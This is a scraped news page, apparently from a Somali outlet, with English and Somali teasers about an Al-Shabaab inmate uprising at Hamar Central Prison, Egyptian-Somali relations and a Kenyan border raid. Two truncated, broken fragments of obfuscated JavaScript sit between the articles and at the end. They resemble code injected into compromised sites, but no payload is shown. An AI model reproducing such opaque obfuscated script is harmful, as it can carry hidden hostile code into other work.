Somali Security Forces End Prison Attack, Kill Five Al-Shabaab Inmates
MOGADISHU, Somalia - In a dramatic turn of events at Hamar Central Prison in Somalia, the Correctional Forces successfully ended a violent uprising that erupted within the facility.
The incident unfolded when five inmates, identified as members of the notorious Al-Shabaab terrorist group, attempted to break out by force.
The Department of Corrections swiftly responded to the crisis, neutralizing the threat...
Xildhibaanada BJFS oo maanta ka dooday hindise sharciyeedyo muhiim ah
MUQDISHO (SMN) - Xildhibaanada golaha shacabka ee Baarlamaanka Federaalka Soomaaliya oo maanta kulan ku yeeshay magaalada Muqdisho ayaa ka dooday dhismaha hay’adaha madaxa bannaan ee aan miisaaniyadda lahayn.
Kulanka oo uu shir gudooomiyay guddoomiyaha golaha shacabka Sheekh Aadan Maxamed Nuur ( Madoobe), ayaa sidoo kale, waxaa looga hadlayaa hindise-sharciyeedyada kala ah maalgashiga iyo shaqada Soomaaliyeed.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...
Ehelka Sayid Cali Macalin oo ka hadlay xaaladda uu ku sugan yahay wiilkooda
MUQDISHO (SMN) - Eehellada Sayid Cali Macallin Daa'uud oo xukumay dil toogasho ah ayaa ka hadlay xaaladda wiilkooda, kadib markii weerarkii maanta lagu qaaday xabsiga dhexe.
Nuur Xirsi oo ah adeerka Sayid Cali, isla markaana uu warramay Shabelle ayaa sheegay in wiilkooda uu lasoo xiriiray marka dagaalka bilowday, uuna nabad qabo.
"Wiilka annaga waa nasoo wacay markii ay xabadda bilaaatay ayuu...
Wararkii ugu dambeeyay weerarka xabsiga dhexe ee Xamar + Khasaaraha
MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda Soomaaliya ayaa ugu dambeyn soo afjaray weerarkii xabsiga dhexe ee Xamar, kadib howlgal culus oo saacado qaatay.
Weerarka ayaa waxaa soo abaabulay xubno ku eedeysnaa Al-Shabaabnimo, kuwaas oo loo dusiyay hub iyo bambaanooyin, ayaga oo sidaas kula dagaalamay ciidamada ammaanka.
Dhammaan ragga maxaabiista ah ee weerarka abaabulay ayaa la toogtay, kuwaas oo tiradoodu ay...
Egypt Vows Unwavering Support for Somalia’s Unity and Independence
MOGADISHU, Somalia - Egypt's Minister of Foreign Affairs, Mr. Badar Abdul Aati, expressed his country's full support for Somalia's unity and independence. The visit marked a significant moment in bilateral relations, underscored by the inauguration of a direct flight line between the two nations.
Addressing a press conference, Minister Abdul Aati conveyed the greetings of Egyptian President Fatah Al-Sisi to...
Kenyan forces kill four militants, deal major blow to Al-Shabaab in border operation
MANDERA, Kenya - Kenyan security forces have killed four Al-Shabaab militants and seized a substantial weapons cache near the Somalia border in a significant counter-terrorism operation, security officials have said.
The intelligence-led mission, carried out by a Multi-Agency Security Team in Banisa Sub-County, Mandera, marks another crucial victory in Kenya's ongoing war against terrorism and underscores the country's increasingly sophisticated...
BREAKING: Gunfire Erupts at Hamar Central Prison as Inmates Take Up Arms
MOGADISHU, Somalia - In a shocking turn of events, Hamar Central Prison in Somalia has descended into chaos as reports of gunshots and explosions have been heard from within the facility.
It is alleged that inmates affiliated with the Al-Shabaab (AS) group have managed to obtain firearms and explosives, leading to a violent confrontation with prison guards.
Eyewitnesses and sources within...
Daawo: Jubbaland oo amniga degmada Luuq ku wareejisay ciidanka Itoobiya
LUUQ (SMN) - Dowlad goboleedka Jubbaland ayaa si toos ah amniga degmada Luuq ugu wareejisay ciidamada Itoobiya ee qaybta ka ah howlgalka ATMIS, kuna sugan gobolka Gedo.
Madaxweyne ku xigeenka koowaad ee Jubbaland Mudane Maxamuud Sayid Aadan oo haatan ku sugan degmada Luuq ayaa la kulmay saraakiisha ciidanka Itoobiya, isaga oo kala hadlay amniga degmada iyo dagaalka ka dhanka ah...
Dowladda Masar oo markale taageero u muujiysay midnimada Soomaaliya
MUQDISH9 (SMN) - Wasiirka Arrimaha Dibadda Masar, Mudane Badar Cabdulcaati ayaa sheegay in dowladda Masar ay si buuxda u taageersan tahay midnimada iyo madax-bannaanida Soomaaliya, kaddib shir jaraa’id oo uu maanta ku qabtay caasimadda Muqdisho.
Ugu horeyn, wasiirka ayaa uga mahadceliyay dowladda iyo shacabka Soomaaliyeed sida wanaagsan ee ay u soo dhaweeyeen, wuxuuna ku tilmaamay daah-furka khad duulimaad toos ah...
DEG DEG: Weerar culus oo lagu qaaday xabsiga dhexe ee Xamar
MUQDISHO (SMN) - Xabsiga dhexe ee Xamar ayaa lagu soo waramayaa in laga maqlay dhawaqa rasaas iyo bambooyin.
Wararka qaar ayaa sheegaya in Maxaabiista u xiran AS-nimada ay heleen qoryo iyo Bambooyin halkaana ay ka bilaabeen rasaas iyo bombaanooyin.
Ciidanka Xabsiga ilaaliya ayaa la sheegaya in ay hareereeyeen Maxaabiista dagaalamaysa.
Faahfaahinka kala soco Shabellemedia.com
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return...










